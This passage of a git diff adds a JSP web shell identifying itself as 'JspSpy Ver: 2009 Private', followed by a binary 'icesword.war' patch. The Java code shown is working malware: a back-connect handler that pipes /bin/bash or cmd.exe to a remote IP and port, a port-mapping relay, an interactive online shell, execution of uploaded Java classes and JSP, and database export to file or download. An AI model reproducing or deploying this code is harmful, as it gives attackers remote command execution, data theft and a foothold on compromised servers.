JSession.getAttribute(PORT_MAP); + if (obj != null) { + ServerSocket s = (ServerSocket)obj; + s.close(); + } + final ServerSocket server = new ServerSocket(); + server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); + JSession.setAttribute(PORT_MAP,server); + new Thread(new Runnable(){ + public void run(){ + while (true) { + Socket soc = null; + Socket remoteSoc = null; + DataInputStream remoteIn = null; + DataOutputStream remoteOut = null; + DataInputStream localIn = null; + DataOutputStream localOut = null; + try{ + soc = server.accept(); + remoteSoc = new Socket(); + remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); + remoteIn = new DataInputStream(remoteSoc.getInputStream()); + remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); + localIn = new DataInputStream(soc.getInputStream()); + localOut = new DataOutputStream(soc.getOutputStream()); + StreamConnector.readFromLocal(localIn,remoteOut); + StreamConnector.readFromRemote(soc,remoteSoc,remoteIn,localOut); + }catch(Exception ex) + { + break; + } + } + } + + }).start(); + JSession.setAttribute("done","Map Port Success!"); + JSession.setAttribute("localIP",localIP); + JSession.setAttribute("localPort",localPort); + JSession.setAttribute("remoteIP",remoteIP); + JSession.setAttribute("remotePort",remotePort); + JSession.setAttribute(SESSION_O,"vmp"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + //VBackConnect + private static class VbcInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object ip = JSession.getAttribute("ip"); + Object port = JSession.getAttribute("port"); + Object program = JSession.getAttribute("program"); + Object done = JSession.getAttribute("done"); + JSession.removeAttribute("ip"); + JSession.removeAttribute("port"); + JSession.removeAttribute("program"); + JSession.removeAttribute("done"); + if (Util.isEmpty(ip)) + ip = request.getRemoteAddr(); + if (Util.isEmpty(port) || !Util.isInteger(port.toString())) + port = "53"; + if (Util.isEmpty(program)) { + if (ISLINUX) + program = "/bin/bash"; + else + program = "cmd.exe"; + } + + if (!Util.isEmpty(done)) + Util.outMsg(out,done.toString()); + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + ""+ + "

          Back Connect >>

          "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          Your Ip :"+ + " "+ + " Your Port :"+ + " Program To Back :"+ + "

          "+ + " "+ + "
          "+ + "
          "+ + "
          "+ + "
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class BackConnectInvoker extends DefaultInvoker { + public boolean doAfter(){return false;} + public boolean doBefore(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String ip = request.getParameter("ip"); + String port = request.getParameter("port"); + String program = request.getParameter("program"); + if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) + return; + Socket socket = new Socket(ip,Integer.parseInt(port)); + Process process = Runtime.getRuntime().exec(program); + (new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); + (new StreamConnector(process.getErrorStream(), socket.getOutputStream())).start(); + (new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); + JSession.setAttribute("done","Back Connect Success!"); + JSession.setAttribute("ip",ip); + JSession.setAttribute("port",port); + JSession.setAttribute("program",program); + JSession.setAttribute(SESSION_O,"vbc"); + response.sendRedirect(SHELL_NAME); + } catch (Exception e) { + + throw e ; + } + } + } + private static class JspEnvInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""+ + " "+ + " "+ + " "+ + "

          System Properties >>

          "+ + "
          "+ + "
          "+ + "
            "); + Properties pro = System.getProperties(); + Enumeration names = pro.propertyNames(); + while (names.hasMoreElements()){ + String name = (String)names.nextElement(); + out.println("
          • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
          • "); + } + out.println("

          System Environment >>


            "); + /* + Map envs = System.getenv(); + Set> entrySet = envs.entrySet(); + for (Map.Entry en:entrySet) { + out.println("
          • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
          • "); + }*/ + out.println("
          "); + } catch (Exception e) { + + throw e ; + } + } + } + private static class ReflectInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + String c = request.getParameter("Class"); + Class cls = null; + try { + if (!Util.isEmpty(c)) + cls = Class.forName(c); + } catch (ClassNotFoundException ex) { + Util.outMsg(out,"Class "+c+" Not Found ! "); + } + out.println("
          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "

          Java Reflect >>

          "+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          Class Name : "+ + "
          "+ + "
          "+ + "
          "); + + if (cls != null) { + StringBuffer sb = new StringBuffer(); + if (cls.getPackage() != null) + sb.append("package "+cls.getPackage().getName()+";\n"); + String n = null; + if (cls.isInterface()) + n = ""; + //else if (cls.isEnum()) + // n = "enum"; + else + n = "class"; + sb.append(Modifier.toString(cls.getModifiers())+" "+n+" "+cls.getName()+"\n"); + if (cls.getSuperclass() != null) + sb.append("\textends "+cls.getSuperclass().getName()+"\n"); + if (cls.getInterfaces() != null && cls.getInterfaces().length != 0) { + Class[] faces = cls.getInterfaces(); + sb.append("\t implements "); + for (int i = 0;i"+faces[i].getName()+""); + if (i != faces.length -1) { + sb.append(","); + } + } + } + sb.append("{\n\t\n"); + sb.append("\t//constructors..\n"); + Constructor[] cs = cls.getConstructors(); + for (int i = 0;i"); + if (obj != null) + sb.append(obj.toString()); + else + sb.append("NULL"); + + sb.append(""); + } + sb.append("\n"); + } + + sb.append("\n\t//methods\n"); + Method[] ms = cls.getDeclaredMethods(); + for (int i =0;i")+""; + Util.outMsg(out,m,"left"); + } + } catch (Exception e) { + throw e; + } + } + } + private static class TopInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + " "+ + " "+ + "
          JspSpy Ver: 2009 Private "+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+") | copy
          Logout | "+ + " File Manager | "+ + " DataBase Manager | "+ + " Execute Command | "+ + " Shell OnLine | "+ + " Back Connect | "+ + " Java Reflect | "+ + " "+ + " Eval Java Code | "+ + " Port Scan | "+ + " Download Remote File | "+ + " ClipBoard | "+ + " Port Map | "+ + " Others | "+ + " JSP Env "+ + "
          "); + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out,JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + if (JSession.getAttribute(ENTER_MSG) != null) { + String outEntry = request.getParameter("outentry"); + if (Util.isEmpty(outEntry) || !outEntry.equals("true")) + Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class VOnLineShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + out.println(""+ + " "+ + " "+ + " "+ + "
          "); + out.println("

          Shell OnLine »


          "); + out.println("
          "+ + " "+ + " "+ + " Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ + "
          "+ + "
          "+ + " "+ + "
          "+ + " "+ + " "+ + " "+ + " Auto Scroll"+ + " "+ + "
          "+ + " " + ); + out.println("
          "); + } catch (Exception e) { + throw e ; + } + } + } + private static class OnLineInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String type = request.getParameter("type"); + if (Util.isEmpty(type)) + return; + if (type.toLowerCase().equals("start")) { + String exe = request.getParameter("exe"); + if (Util.isEmpty(exe)) + return; + Process pro = Runtime.getRuntime().exec(exe); + ByteArrayOutputStream outs = new ByteArrayOutputStream(); + response.setContentLength(100000000); + response.setContentType("text/html;charset="+System.getProperty("file.encoding")); + OnLineProcess olp = new OnLineProcess(pro); + JSession.setAttribute(SHELL_ONLINE,olp); + new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); + new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); + new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); + Thread.sleep(1000 * 60 * 60 * 24); + } else if (type.equals("ecmd")) { + Object o = JSession.getAttribute(SHELL_ONLINE); + String cmd = request.getParameter("cmd"); + if (Util.isEmpty(cmd)) + return; + if (o == null) + return; + OnLineProcess olp = (OnLineProcess)o; + olp.setCmd(cmd); + } else { + Object o = JSession.getAttribute(SHELL_ONLINE); + if (o == null) + return; + OnLineProcess olp = (OnLineProcess)o; + olp.stop(); + } + } catch (Exception e) { + + throw e; + } + } + } + private static class EnterInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (!Util.isEmpty(type)) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + JSession.setAttribute(MSG,"Exit File Success ! "); + } else { + String f = request.getParameter("filepath"); + if (Util.isEmpty(f)) + return; + JSession.setAttribute(ENTER,f); + JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); + } + response.sendRedirect(SHELL_NAME); + } + } + private static class VExport2FileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + String sql = request.getParameter("sql"); + String table = request.getParameter("table"); + if (Util.isEmpty(sql) && Util.isEmpty(table)) { + JSession.setAttribute(SESSION_O,"vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + out.println("
          "+ + ""+ + " "+ + " "+ + " "+ + "
          "+ + " "+ + " "+ + " "+ + " "+ + "

          Export To File »

          "+ + " "+ + "
          Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File :

          "+BACK_HREF+"
          "+ + "
          "); + } + } + + private static class ExportInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + String type = request.getParameter("type"); + String filepath = request.getParameter("filepath"); + String sql = null; + DBOperator dbo = null; + dbo = (DBOperator)JSession.getAttribute(DBO); + + if (Util.isEmpty(type)) { + //table export + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); + sql = "select * from "+s+tb+s; + + } else if (type.equals("queryexp")) { + //query export + sql = request.getParameter("sql"); + if (Util.isEmpty(sql)) { + JSession.setAttribute(SESSION_O,"vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + } + Object o = dbo.execute(sql); + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + byte[] rowSep = "\r\n".getBytes(); + if (o instanceof ResultSet) { + ResultSet rs = (ResultSet)o; + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + for (int i =1;i<=count;i++) { + String colName = meta.getColumnName(i)+"\t"; + byte[] b = colName.getBytes(); + bout.write(b,0,b.length); + } + bout.write(rowSep,0,rowSep.length); + while (rs.next()) { + for (int i =1;i<=count;i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + v += "\t"; + byte[] b = v.getBytes(); + bout.write(b,0,b.length); + } + bout.write(rowSep,0,rowSep.length); + } + rs.close(); + ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); + BufferedOutputStream output = null; + if (!Util.isEmpty(filepath)) { + //export2file + output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); + } else { + //download. + response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); + output = new BufferedOutputStream(response.getOutputStream()); + } + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data,0,len); + len = input.read(data); + } + bout.close(); + input.close(); + output.close(); + if (!Util.isEmpty(filepath)) { + JSession.setAttribute(MSG,"Export To File Success !"); + response.sendRedirect(SHELL_NAME); + } + } + } + } + private static class EvalInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + JSession.removeAttribute(MSG); + } + if (Util.isEmpty(type)) { + out.println(""+ + " "+ + " "+ + " "+ + "

          Eval Java Code »

          "+ + "
          "+ + "

          "+ + "

          "+ + "UpLoad a Class File : "); + Util.outMsg(out,"
          "+
          +					"public class SpyEval{\r\n"+
          +					"	static {\r\n"+
          +					"		//Your Code Here.\r\n"+
          +					"	}\r\n"+
          +					"}\r\n"+
          +					"
          ","left"); + out.println("

          "+ + "

          Jsp Eval :
          "+ + " "+ + " "+ + "
          "+ + "
          "+ + "

          "+ + "
          "); + } else if (type.equals("jsp")){ + String jspc = request.getParameter("jspc"); + if (Util.isEmpty(jspc)) + return; + File f = new File(SHELL_DIR,"evaltmpninty.jsp"); + BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); + writer.write(jspc,0,jspc.length()); + writer.flush(); + writer.close(); + out.println(""+ + " "+ + "

          Jsp Eval Result »

          "); + out.println("
          "); + request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); + out.println("
          "); + f.delete(); + } + } + } + private static class EvalUploadInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + UploadBean upload = new UploadBean(); + upload.setTargetOutput(stream); + upload.parseRequest(request); + + if (stream.toByteArray().length == 2) { + JSession.setAttribute(MSG,"Please Upload Your Class File ! "); + ((Invoker)ins.get("ev")).invoke(request,response,JSession); + return; + } + SpyClassLoader loader = new SpyClassLoader(); + try { + Class c = loader.defineClass(null,stream.toByteArray()); + c.newInstance(); + }catch(Exception e) { + } + stream.close(); + JSession.setAttribute(MSG,"Eval Java Class Done ! "); + ((Invoker)ins.get("ev")).invoke(request,response,JSession); + } + } + private static class VOtherInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + JSession.removeAttribute(MSG); + } + out.println(""+ + " "+ + " "+ + " "+ + "

          Session Manager>>


          "+ + "
          "+ + "
            "); + Enumeration en = JSession.getAttributeNames(); + while (en.hasMoreElements()) { + Object o = en.nextElement(); + if (o.toString().equals(MSG)) + continue; + out.println("
          • "+o.toString()+" "); + out.println(" "); + out.println(""); + out.println(""); + out.println("
          • "); + } + out.println("
          • "+ + "New Session Attribute"+ + "name : value : "+ + "
          "); + } catch (Exception e) { + throw e ; + } + } + } + //Session Manager + private static class SmInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + if (type.equals("update")) { + String name = request.getParameter("name"); + String value = request.getParameter("value"); + JSession.setAttribute(name,value); + JSession.setAttribute(MSG,"Update/Add Attribute Success !"); + } else if (type.equals("delete")) { + String name = request.getParameter("name"); + JSession.removeAttribute(name); + JSession.setAttribute(MSG,"Remove Attribute Success !"); + } + ((Invoker)ins.get("vother")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + + static{ + ins.put("script",new ScriptInvoker()); + ins.put("before",new BeforeInvoker()); + ins.put("after",new AfterInvoker()); + ins.put("deleteBatch",new DeleteBatchInvoker()); + ins.put("clipboard",new ClipBoardInvoker()); + ins.put("vPortScan",new VPortScanInvoker()); + ins.put("portScan",new PortScanInvoker()); + ins.put("vConn",new VConnInvoker()); + ins.put("dbc",new DbcInvoker()); + ins.put("executesql",new ExecuteSQLInvoker()); + ins.put("vLogin",new VLoginInvoker()); + ins.put("login",new LoginInvoker()); + ins.put("filelist", new FileListInvoker()); + ins.put("logout",new LogoutInvoker()); + ins.put("upload",new UploadInvoker()); + ins.put("copy",new CopyInvoker()); + ins.put("bottom",new BottomInvoker()); + ins.put("vCreateFile",new VCreateFileInvoker()); + ins.put("vEdit",new VEditInvoker()); + ins.put("createFile",new CreateFileInvoker()); + ins.put("vEditProperty",new VEditPropertyInvoker()); + ins.put("editProperty",new EditPropertyInvoker()); + ins.put("vs",new VsInvoker()); + ins.put("shell",new ShellInvoker()); + ins.put("down",new DownInvoker()); + ins.put("vd",new VdInvoker()); + ins.put("downRemote",new DownRemoteInvoker()); + ins.put("index",new IndexInvoker()); + ins.put("mkdir",new MkDirInvoker()); + ins.put("move",new MoveInvoker()); + ins.put("removedir",new RemoveDirInvoker()); + ins.put("packBatch",new PackBatchInvoker()); + ins.put("pack",new PackInvoker()); + ins.put("unpack",new UnPackInvoker()); + ins.put("vmp",new VmpInvoker()); + ins.put("vbc",new VbcInvoker()); + ins.put("backConnect",new BackConnectInvoker()); + ins.put("jspEnv",new JspEnvInvoker()); + ins.put("smp",new SmpInvoker()); + ins.put("mapPort",new MapPortInvoker()); + ins.put("top",new TopInvoker()); + ins.put("vso",new VOnLineShellInvoker()); + ins.put("online",new OnLineInvoker()); + ins.put("enter",new EnterInvoker()); + ins.put("export",new ExportInvoker()); + ins.put("ev",new EvalInvoker()); + ins.put("eu",new EvalUploadInvoker()); + ins.put("vother",new VOtherInvoker()); + ins.put("sm",new SmInvoker()); + ins.put("vExport",new VExport2FileInvoker()); + ins.put("vPack",new VPackConfigInvoker()); + ins.put("reflect",new ReflectInvoker()); + ins.put("portBack",new PortBackInvoker()); + } +%> +<% + try { + String o = request.getParameter("o"); + if (Util.isEmpty(o)) { + if (session.getAttribute(SESSION_O) == null) + o = "index"; + else { + o = session.getAttribute(SESSION_O).toString(); + session.removeAttribute(SESSION_O); + } + } + Object obj = ins.get(o); + if (obj == null) { + response.sendRedirect(SHELL_NAME); + } else { + Invoker in = (Invoker)obj; + if (in.doBefore()) { + String path = request.getParameter("folder"); + if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) + session.setAttribute(CURRENT_DIR,path); + ((Invoker)ins.get("before")).invoke(request,response,session); + ((Invoker)ins.get("script")).invoke(request,response,session); + ((Invoker)ins.get("top")).invoke(request,response,session); + } + in.invoke(request,response,session); + if (!in.doAfter()) { + return; + }else{ + ((Invoker)ins.get("bottom")).invoke(request,response,session); + ((Invoker)ins.get("after")).invoke(request,response,session); + } + } + } catch (Exception e) { + Object msg = session.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + session.removeAttribute(MSG); + } + if (e.toString().indexOf("ClassCastException") != -1) { + Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); + } + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + e.printStackTrace(new PrintStream(bout)); + session.setAttribute(CURRENT_DIR,SHELL_DIR); + Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
          "),"left"); + bout.close(); + out.flush(); + ((Invoker)ins.get("bottom")).invoke(request,response,session); + ((Invoker)ins.get("after")).invoke(request,response,session); + } +%> diff --git a/other/icesword.war b/other/icesword.war new file mode 100644 index 0000000000000000000000000000000000000000..dc8f1e343e7c3084b503f14f20a1e1903a541aa7 GIT binary patch literal 11470 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 